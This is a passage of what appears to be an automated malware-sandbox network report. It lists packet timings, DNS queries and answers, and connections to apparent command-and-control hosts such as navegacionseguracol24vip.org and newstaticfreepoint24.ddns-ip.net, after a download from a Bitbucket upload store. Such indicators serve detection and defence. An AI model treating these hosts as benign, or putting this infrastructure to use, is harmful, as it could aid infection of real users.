                                                                                                                                            Dec 12, 2024 17:41:48.177423000 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.177423000 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.184777975 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.184798956 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.184864998 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.184879065 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.184916019 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.184936047 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.327517986 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.327563047 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.327681065 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.327723980 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.327866077 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.328608036 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.333901882 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.333930969 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.334003925 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.334041119 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.334065914 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.335339069 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.341399908 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.341433048 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.341527939 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.341589928 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.341624022 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.341640949 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.348735094 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.348757982 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.348830938 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.348848104 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.351375103 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.355211973 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.355232954 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.355314016 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.355329990 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.359206915 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.363257885 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.363286018 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.363358974 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.363379955 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.363409042 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.367172956 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.369735003 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.369767904 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.369827986 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.369883060 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.369919062 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.371134043 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.377521038 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.377568007 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.377616882 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.377665997 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.377705097 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.379374981 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.383491993 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.520812035 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.520843983 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.520934105 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.520977020 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.521128893 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.527406931 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.527436018 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.527537107 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.527570963 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.529124975 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.534862041 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.534888983 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.534974098 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.534996033 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.537122011 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.542423010 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.542449951 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.542537928 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.542578936 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.545131922 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.549575090 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.549596071 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.549678087 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.549715042 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.553138018 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.556478977 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.556498051 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.556571960 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.556598902 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.557117939 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.562947035 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.562964916 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.563049078 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.563091040 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.565120935 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.570406914 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.570436001 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.570514917 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.570537090 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.570730925 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.713352919 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.713382959 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.713459015 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.713506937 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.713525057 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.713547945 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.720602036 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.720626116 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.720738888 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.720761061 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.721132040 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.727027893 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.727051973 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.727118969 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.727154016 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.727180958 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.727262020 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.734323025 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.734349966 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.734440088 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.734508991 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.734909058 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.741761923 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.741785049 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.741843939 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.741875887 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.741894960 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.742116928 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.748794079 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.748823881 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.748881102 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.748914003 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.748931885 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.749027967 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.756267071 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.756285906 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.756362915 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.756401062 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.756444931 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.762651920 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.762674093 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.762738943 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.762773991 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.762793064 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.762814999 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.910355091 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.910384893 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.910446882 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.910486937 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.910507917 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.910686970 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.916884899 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.916928053 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.916979074 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.916990995 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.917021990 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.917036057 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.924245119 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.924267054 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.924319029 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.924329996 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.924356937 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.924375057 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.930584908 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.930605888 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.930653095 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.930660963 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.930687904 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.930705070 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.938123941 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.938146114 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.938200951 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.938208103 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.938232899 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.938251972 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.945012093 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.945039988 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.945097923 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.945107937 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.945136070 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.945152044 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.952527046 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.952547073 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.952590942 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.952606916 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.952629089 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.952646971 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.959975004 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.960006952 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.960051060 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.960059881 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:48.960088015 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:48.960103035 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.103877068 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.103909016 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.103965998 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.103995085 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.104015112 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.104038954 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.110688925 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.110721111 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.110769987 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.110779047 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.110816956 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.110832930 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.112888098 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.112972975 CET4434974354.231.203.105192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:49.112998009 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.113495111 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:49.114506006 CET49743443192.168.2.554.231.203.105
                                                                                                                                            Dec 12, 2024 17:41:51.820370913 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:51.941239119 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:51.941487074 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:51.946708918 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:52.067656994 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:52.067724943 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:52.190613031 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:53.422435045 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:53.425204039 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:53.430774927 CET4976930203192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:41:53.551068068 CET3020349769181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:16.423259974 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:16.544270039 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:16.544398069 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:16.545423985 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:16.665369034 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:17.820688009 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:17.822395086 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:17.942219973 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:18.057919025 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:18.100867033 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:18.511322975 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:18.631402969 CET8049836178.237.33.50192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:18.631762028 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:18.631762028 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:18.751698971 CET8049836178.237.33.50192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:19.875309944 CET8049836178.237.33.50192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:19.877289057 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:19.989689112 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:20.111937046 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:20.226831913 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:20.228928089 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:20.350220919 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:20.874943972 CET8049836178.237.33.50192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:20.875041008 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:42:50.290949106 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:50.296288967 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:42:50.417057991 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:43:20.306886911 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:43:20.314275026 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:43:20.434056997 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:43:50.307885885 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:43:50.309927940 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:43:50.429847002 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:44:08.335653067 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:44:08.647775888 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:44:09.272806883 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:44:10.507277012 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:44:12.975877047 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:44:17.897726059 CET4983680192.168.2.5178.237.33.50
                                                                                                                                            Dec 12, 2024 17:44:20.335417032 CET184249831181.131.217.244192.168.2.5
                                                                                                                                            Dec 12, 2024 17:44:20.337677956 CET498311842192.168.2.5181.131.217.244
                                                                                                                                            Dec 12, 2024 17:44:20.457722902 CET184249831181.131.217.244192.168.2.5

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 12, 2024 17:41:35.651539087 CET5741653192.168.2.51.1.1.1
                                                                                                                                            Dec 12, 2024 17:41:35.855915070 CET53574161.1.1.1192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:37.760978937 CET5203553192.168.2.51.1.1.1
                                                                                                                                            Dec 12, 2024 17:41:37.899630070 CET53520351.1.1.1192.168.2.5
                                                                                                                                            Dec 12, 2024 17:41:40.549535990 CET6391253192.168.2.51.1.1.1
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET53639121.1.1.1192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:16.278089046 CET5542853192.168.2.51.1.1.1
                                                                                                                                            Dec 12, 2024 17:42:16.418184996 CET53554281.1.1.1192.168.2.5
                                                                                                                                            Dec 12, 2024 17:42:18.368263960 CET5843053192.168.2.51.1.1.1
                                                                                                                                            Dec 12, 2024 17:42:18.507611990 CET53584301.1.1.1192.168.2.5

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Dec 12, 2024 17:41:35.651539087 CET192.168.2.51.1.1.10x2344Standard query (0)navegacionseguracol24vip.orgA (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:37.760978937 CET192.168.2.51.1.1.10x56a7Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.549535990 CET192.168.2.51.1.1.10x6150Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:42:16.278089046 CET192.168.2.51.1.1.10xeebbStandard query (0)newstaticfreepoint24.ddns-ip.netA (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:42:18.368263960 CET192.168.2.51.1.1.10xb3dbStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Dec 12, 2024 17:41:35.855915070 CET1.1.1.1192.168.2.50x2344No error (0)navegacionseguracol24vip.org181.131.217.244A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:37.899630070 CET1.1.1.1192.168.2.50x56a7No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:37.899630070 CET1.1.1.1192.168.2.50x56a7No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:37.899630070 CET1.1.1.1192.168.2.50x56a7No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-w.us-east-1.amazonaws.com54.231.203.105A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-w.us-east-1.amazonaws.com52.217.231.41A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-w.us-east-1.amazonaws.com3.5.28.158A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-w.us-east-1.amazonaws.com3.5.21.159A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-w.us-east-1.amazonaws.com52.217.161.249A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-w.us-east-1.amazonaws.com52.217.17.108A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-w.us-east-1.amazonaws.com3.5.22.158A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:41:40.788880110 CET1.1.1.1192.168.2.50x6150No error (0)s3-w.us-east-1.amazonaws.com52.216.78.20A (IP address)IN (0x0001)false
